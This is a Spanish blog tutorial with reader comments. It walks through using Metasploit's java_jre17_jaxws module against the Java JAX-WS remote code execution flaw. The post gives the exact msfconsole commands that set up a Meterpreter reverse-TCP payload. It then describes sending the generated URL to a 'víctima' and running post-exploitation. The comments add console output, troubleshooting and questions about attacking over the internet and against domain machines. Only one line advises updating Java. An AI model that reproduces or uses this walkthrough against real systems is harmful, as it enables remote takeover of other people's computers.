Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.
El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.
El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.
Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.
REQUERIMIENTOS:
Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Google Chorme, Firefox o IE (Victima)
PROCEDIMIENTO DEL ATAQUE:
Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_jaxws
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.19
set TARGET 1
set LHOST 192.168.1.19
exploit
------------------------------------------------------------------------------------------------------------------
Como ya es de conocimiento y costumbre, estos comandos creara una URL que sera enviada a al usuario para que lo ejecute desde cualquier navegador web, ya sea Google Chorme, Firefox, Internet Explorer u Opera que contenga la version del Java vulnerable 1.7.0_07-b10 y anteriores.
Seguidamente si el usuario logra ejecutar la URL generada en cualquier Sistema Operativo o Navegador, lograremos obtener una session metepreter como se aprecia en la siguiente imagen:
Por lo tanto, solo quedaría ejecutar los respectivos comandos de Explotación y Post-Explotacion para aprovecharnos del sistema que hemos vulnerable con una simple URL gracias a este nuevo exploit recién salida del horno.
VIDEO-TUTORIAL:
Para no ser victima de este Ataque, se recomienda actualizar el Java a la ultima versión disponible, que se puede descargar haciendo clic Aqui.
Un saludo.
Lo e echo con un PC con el S.O. Windows 7 y me da este error:
ResponderEliminarjava_JAX-WS - Exception handling request: No such file or directory - C:/metasploit/msf3/data/exploits/cve-2012-5076/Exploit.class
Por que me sale esto ¿?
Hola,
EliminarAl parecer estas ejecutando el MSF desde un Windows y no lo tenes actualizado.
Ese error indica que no encuentra el cve-2012-5076/Exploit.class, ejecuta el comando msfupdate.
Saludos.
Gracias por contestarme :)
EliminarLo que e echo ahora a sido ejecutar Msf update y me sale otro error jeje me sale esto:
https://picasaweb.google.com/113556193702083725238/15DeNoviembreDe2012#5810873011160327394
Te aconsejo que utilices backtrack o cualquier otra distribución de linux, tendras menos errores que con windows ;)
EliminarExiste alguna manera de correr el exploit remotamente, es decir no localmente sino mediante internet sin tener que montar un host ja ja ?
ResponderEliminarHola,
EliminarSi de hecho, podes usar el comando RHOST e indicar la IP de la victima.
Saludos.
les hace falta mucho por aprender , Caleb bonito tu blog informacion buena y muy bien explicada , que sigas escribiendo mas post .
Eliminarya no funciona amigos , fue corregida un saludo :)
ResponderEliminarHola, ¿como se puede saber a que version de java corresponde ese fallo?
ResponderEliminarGracias
Hola, las versiones vulnerables son el 1.7.0_07-b10 y anteriores.
EliminarResaltar que las versiones vulnerables son las versiones de los updates que se realizo cuando se encontró el ultimo 0-day en octubre.
Un saludo.
yo me refiero a la version de java, yo por ejemplo en mi pc tengo la version 6, y no se si el 1.7.0_07-b10 corresponde a esta versión o no.
EliminarUn Saludo
Buenas, lo he probado pero me sale esto:
ResponderEliminarmsf > use exploit/multi/browser/java_jre17_jaxws
msf exploit(java_jre17_jaxws) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(java_jre17_jaxws) > set SRVHOST 192.168.1.33
SRVHOST => 192.168.1.33
msf exploit(java_jre17_jaxws) > set TARGET 1
TARGET => 1
msf exploit(java_jre17_jaxws) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(java_jre17_jaxws) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.33:4444
msf exploit(java_jre17_jaxws) > [*] Using URL: http://192.168.1.33:8080/Oh62SObwNC
[*] Server started.
[*] 192.168.1.34 java_jre17_jaxws - Java Applet JAX-WS Remote Code Execution handling request
[*] 192.168.1.34 java_jre17_jaxws - Sending Applet.jar
[*] 192.168.1.34 java_jre17_jaxws - Sending Applet.jar
[*] 192.168.1.34 java_jre17_jaxws - Java Applet JAX-WS Remote Code Execution handling request
y no pasa de aqui. Lo he probado en un pc vulnerable.
Gracias
Hola,
EliminarLos comandos que estas ejecutando están perfectamente, al parecer la versión del Java que tiene la PC vulnerable no es la que he mencionado en esta entrada.
Podes fijarte la versión desde el CMD ejecutando java --version
Saludos.
Gracias por responder Caleb Bucker, el comando que pones desde el CMD no me funciona.He mirado en Agregar y Quitar programas y me pone la versión Java 6 update 26. He buscado por internet y creo que esa versión si es vulnerable (1.6.0_35-b10). Seguiré probando.
EliminarUn Saludo
java version "1.7.0_09"
ResponderEliminarJava(TM) SE Runtime Environment (build 1.7.0_09-b05)
Java HotSpot(TM) 64-Bit Server VM (build 23.5-b02, mixed mode)
corregido
yo no lo he actualizado, sigo con la versión 1.6.0_35-b10, que teoricamente es vulnerable.
EliminarUn Saludo
Hi Amigos
ResponderEliminarI noticed that i am able to take control of the victim ( XP or Win7) if it is in work group , but if victim is in a domain exploit always fails.
Any additional step needed in case the victim is in a domain ?